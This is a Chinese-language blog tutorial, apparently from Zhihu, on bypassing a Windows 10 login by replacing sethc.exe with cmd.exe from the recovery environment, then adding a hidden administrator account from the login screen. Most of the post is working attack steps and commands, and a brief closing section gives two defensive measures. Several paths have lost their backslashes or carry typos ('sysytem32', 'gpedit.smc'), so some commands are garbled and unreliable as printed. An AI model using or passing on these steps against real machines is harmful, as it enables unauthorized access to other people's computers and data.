利用系統漏洞破解windows 10用戶與防護
測試系統:windows 10專業1709版本
我們依舊採用的是採用調用「粘滯鍵」的方法進行破解,即「sethc.exe」文件做為跳板對本地用戶(對使用微軟賬號來登陸電腦的賬號,無法通過DOS進行密碼重置)進行修改或者添加新用戶方式,來繞過進入系統。
進入「命令提示符」模式:
1.首先,通過對處於登陸界面後按下關機鍵強關機,然後出現windows logo且下方出現滾動的圓圈的時候再強制關機,如此重複3次。來進入wind10 的RE模式,即診斷修復模式;
2.當出現「自動修復」提示界面時,選擇「高級選項」;
3.然依次選擇「疑難解答」->「高級選項」->「命令提示符」,然等待;
4.在彈出的管理員cmd對話框,注意此對話框的上方標明了 x:windowssystem32cmd.exe;(這裡調用的不是電腦本身的系統盤符下的cmd)
;
修改「sethc.exe」文件(即狸貓換太子手法):
- 在管理員窗口中執行:
diskpart 回車 \磁碟分區管理工具list volume 回車 \獲得計算機中分區列表及每個卷的信息
- 確認好系統盤符後,這裡確認為C盤,執行:(本人嘗試過,沒辦法直接切換到C盤目錄下做後續操作);
exit 回車 \退出磁碟分區管理工具
- 然後執行以下命令來確認c:windowssystem32目錄下是否存在cmd.exe 和sethc.exe 兩個文件:(記住一定要加上路徑);
dir c:windowssysytem32sethc.exe 回車dir c:windowssysytem32cmd.exe 回車
- 然後執行以下命令對sethc.exe重命名。我這裡改成了sethc11 文件(建議把exe後綴給去掉);
ren c:windowssystem32sethc.exe sethc11 回車 \對sethc.exe 文件重命名
- 複製cmd.exe文件為cmd11.exe。然後重命名cmd11.exe為sethc.exe即可;
copy c:windowssystem32cmd.exe c:windowssystem32cmd11.exe 回車 \複製cmd.exe為cmd11.exeren c:windowssystem32cmd11.exe sethc.exe 回車 \重命名cmd11.exe為sethc.exe
- 關閉管理員窗口,重啟windows,正常進入登陸界面;
調用管理員許可權cmd對用戶進行修改:
- 在登陸界面,按下5次shift鍵,然後會彈出管理員許可權的CMD窗口;
- 然後執行以下命令,新增一個用戶並升級為管理員許可權;
net user sss /add 回車 \創建一個sss的用戶net localgroup administrators sss /add \把sss用戶升級為管理員許可權
- 然後你就用可以使用sss用戶訪問電腦了;
最後總結下此種方式思路其實也是沿用了windows 7的破解方式,但是在進入診斷修復模式這個地方可能會出現不少問題,比如進不去(注意操作方式正確性)。還有就是在通過命令對setch.exe 和 cmd.exe文件修改地方(一定要注意文件存放的位置,不要搞錯了)。
不借外部工具,對window 7用戶密碼破解與防護 https://zhuanlan.zhihu.com/p/33974240
這裡也順便介紹下關於此漏洞防護操作。(不知道後期微軟會不會修復此問題)
方案一:
簡單粗暴,直接把C:WindowsSysWOW64目錄下的sethc文件的執行許可權全部取消或讓其拒絕訪問。
方案二:
在開始-運行里執行gpedit.smc,打開本地組策略編輯器。
依次打開用戶配置-管理模板-系統,找到不運行指定的windows應用程序策略,將其激活並把sethc.exe添加進去即可
如果大家還有其他方式或意見請留言,謝謝;
推薦閱讀: